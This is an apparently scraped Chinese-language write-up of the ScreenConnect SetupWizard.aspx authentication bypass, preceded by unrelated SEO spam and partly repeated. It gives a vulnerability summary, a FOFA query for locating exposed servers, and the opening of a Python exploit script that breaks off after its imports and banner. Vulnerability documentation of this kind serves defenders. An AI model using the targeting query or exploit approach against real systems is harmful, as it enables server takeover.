黄冈免费网站建设平台,二级不死域名购买,wordpress 外链顶部条,小说阅读网站开发视频0x01 产品简介
ConnectWise ScreenConnect ,是一款自托管的远程桌面软件应用,该款软件允许用户自行托管,可以在自己的服务器、个人电脑、虚拟机或虚拟专用服务器上运行。
0x02 漏洞概述
ConnectWise ScreenConnect低于23.9.8 版本的产品中,SetupWizard.aspx接口处存在身…0x01 产品简介
ConnectWiseScreenConnect,是一款自托管的远程桌面软件应用,该款软件允许用户自行托管,可以在自己的服务器、个人电脑、虚拟机或虚拟专用服务器上运行。
0x02 漏洞概述
ConnectWiseScreenConnect低于23.9.8版本的产品中,SetupWizard.aspx接口处存在身份验证漏洞,未经授权攻击者可以利用此漏洞注册账户,并登陆到产品后台进行一系列操作。而且可以通过ScreenConnect的原有功能进行命令执行,可导致服务器被接管的情况。
0x03 影响范围
ScreenConnect 23.9.8
0x04 复现环境
FOFA:
title="ScreenConnect Remote Support Software" || banner="ScreenConnect" || header="ScreenConnect" 0x05 漏洞复现
利用脚本
import requests
import re
import argparsebanner = """ __ ___ ___________ __ _ ______ _/ |__ ____ | |_\\__ ____\\____ _ ________ \\ \\/ \\/ \\__ \\ ___/ ___\\| | \
